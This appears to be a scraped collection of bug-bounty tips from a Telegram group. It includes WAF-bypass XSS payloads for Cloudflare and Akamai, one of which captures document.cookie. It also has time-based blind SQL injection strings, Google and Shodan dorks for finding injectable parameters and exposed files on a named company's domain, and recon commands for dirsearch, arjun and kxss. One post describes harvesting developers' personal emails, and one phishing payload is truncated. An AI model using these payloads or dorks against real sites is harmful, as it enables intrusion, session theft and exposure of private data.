Termux All Command [Telegram Group]

𝗳𝗳𝘂𝗳𝗮𝗶 - An AI-powered wrapper for the popular web fuzzer hashtag#ffuf. It automatically suggests file extensions for fuzzing based on the target URL and its headers, using either OpenAI's hashtag#ChatGPT or Anthropic's hashtag#Claude AI models. » https://lnkd.in/gUBcCDWJ Features: Seamlessly integrates with ffuf. Automatically suggests relevant file extensions for fuzzing. Supports both OpenAI and Anthropic AI models. Passes through all ffuf parameters.

CEH Bullet Point : https://github.com/undergroundwires/CEH-in-bullet-points/tree/master

Another cloudflare bypass 😜 XSS payload used: javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

Google Dorks - XSS, Open Redirect, SQLi, SSRF, LFI, RCE XSS prone parameters: inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com Open Redirect prone parameters inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com SQLi Prone Parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com SSRF Prone Parameters inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com LFI Prone Parameters inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com RCE Prone Parameters inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com

Found 200+ developer's name and personal email via installed.json file , worth reporting or informative on H1? Share your opinion and experience on hackerone specifically! dirsearch -u "https://example[.]com/api/v1.0/" -x 301,403,404,500,400,502,503,302,429

For finding hidden parameter: arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0" arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"

a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '>

𝗖𝗹𝗼𝘂𝗱𝗳𝗹𝗮𝗿𝗲 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 0ss

Akamai WAF (new, requires a click to pop) <A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)> Vector PoC (https://brutelogic.com.br/gym.php?p05=%3CA+%252F=%22%22Href=JavaScript:k=%27a%27,top[k%2B%27lert%27](1)%3Eclick+me) #XSS #Bypass

Bypass Cloudflare WAF (XSS without parentheses) javascript:var{a:onerror}={a:alert};throw%20document.domain #xss #bugbountytips #infosec

Blind SQL Injection payload if(now()=sysdate()%2Csleep(10)%2C0) #Sql #sql_injection #Payload

Sql Injection Payload Payload : 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z #Payload #sql_injection

Some Shodan Dorks that might useful in Bug Bounty. 1. org:"http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”

⚡️Google Dorks - Vulnerable Parameters ⚡️ ⛔️XSS prone parameters: inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com ⛔️Open Redirect prone parameters inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com ⛔️SQLi Prone Parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com ⛔️SSRF Prone Parameters inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com ⛔️LFI Prone Parameters inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com ⛔️RCE Prone Parameters inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com 🔆 Credit- Mike Takashi

try this google dork to find senstive files on website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

xss preventing steps from front end. Input Validation the web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code: Code: javascript function validateEmail(email) { const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test($("#login input[name=email]").val()); } As we can see, this code is testing the email input field and returning true or false whether it matches the Regex validation of an email format.